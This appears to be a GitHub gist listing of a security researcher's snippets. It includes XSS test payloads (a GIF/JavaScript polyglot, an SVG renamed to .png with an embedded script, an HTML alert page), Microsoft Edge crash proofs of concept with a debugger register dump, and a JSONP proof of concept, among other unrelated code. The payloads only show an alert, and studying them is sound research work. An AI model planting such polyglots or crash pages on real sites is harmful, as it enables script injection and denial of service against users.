Skip to content

Instantly share code, notes, and snippets.

View h0wl's full-sized avatar

h0wl h0wl

91 followers · 42 following
View GitHub Profile
@h0wl
h0wl / test.gif
Created March 10, 2024 11:54
test xss gif
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
@h0wl
h0wl / test.svg.png
Created March 10, 2024 11:21
test svg with diff ext
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
@h0wl
h0wl / test.html
Created March 10, 2024 11:19
test html js
<html>
<head>
<script> alert(document.domain);</script>
</head>
<body>
<b> test 123</b>
</body>
</html>
@h0wl
h0wl / test.svg
Created March 10, 2024 11:17
test svg xss
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@h0wl
h0wl / Vitual keystroke example
Created December 17, 2015 11:23 — forked from chriskiehl/Vitual keystroke example
Python win32api simple Vitual keystroke example
#Giant dictonary to hold key name and VK value
VK_CODE = {'backspace':0x08,
'tab':0x09,
'clear':0x0C,
'enter':0x0D,
'shift':0x10,
'ctrl':0x11,
'alt':0x12,
'pause':0x13,
'caps_lock':0x14,
@h0wl
h0wl / IE-Edge-diff.idl
Created November 11, 2015 22:08 — forked from MSEdge/IE-Edge-diff.idl
Proprietary / Non-Inteoperable IE APIs no longer in Microsoft Edge
interface AesGcmEncryptResult {
readonly attribute ArrayBuffer ciphertext;
readonly attribute ArrayBuffer tag;
};
interface BookmarkCollection {
readonly attribute long length;
any item(unsigned long index);
@h0wl
h0wl / edge_crash2.html
Last active November 4, 2015 17:42
Edge Crash No Interaction
<!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse -->
<!doctype html>
<html>
<head>
<script>
function boom() {
var iframe = document.getElementById('iframe1');
iframe.src = "http://bing.com";
iframe.src += "";
document.location.href = '#';
@h0wl
h0wl / edge_crash.log
Created August 19, 2015 20:33
1:053> r
rax=0000000002000001 rbx=00007fff10b35f60 rcx=000000bdb9a099d0
rdx=000000bdb8b100d0 rsi=0000000000000000 rdi=000000bdb9a099d0
rip=00007fff10b80feb rsp=000000bdb9a097c0 rbp=000000bdb9a09860
r8=0000000000000000 r9=0000000000000000 r10=0000000000000000
r11=000000bdb9a09790 r12=000000bdb9a09940 r13=000000b5b6bb94c0
r14=000000bdb8b100d0 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
EDGEHTML!SHIsSameObject+0x4b:
@h0wl
h0wl / edge_crash.html
Last active December 12, 2015 09:51
Microsoft Edge Crash
<!-- based on https://connect.microsoft.com/IE/feedback/details/1683347/ms-edge-combination-of-iframe-anchor-hash-navigation-and-history-state-crashes-the-browse -->
<!doctype html>
<html>
<head>
<script>
function boom() {
var iframe = document.getElementById('iframe1');
document.location.href = '#';
iframe.parentNode.removeChild(iframe);
alert(history.state);
@h0wl
h0wl / json_poc.html
Created June 22, 2015 18:38
IE11 jsonp minimized poc
<!doctype html>
<html ng-app="app">
<head>
<script src="https://code.angularjs.org/1.4.0/angular.js"></script>
<script>
angular.module('app', []).run(function($http) {
$http.post("/boom",
{
"a1": {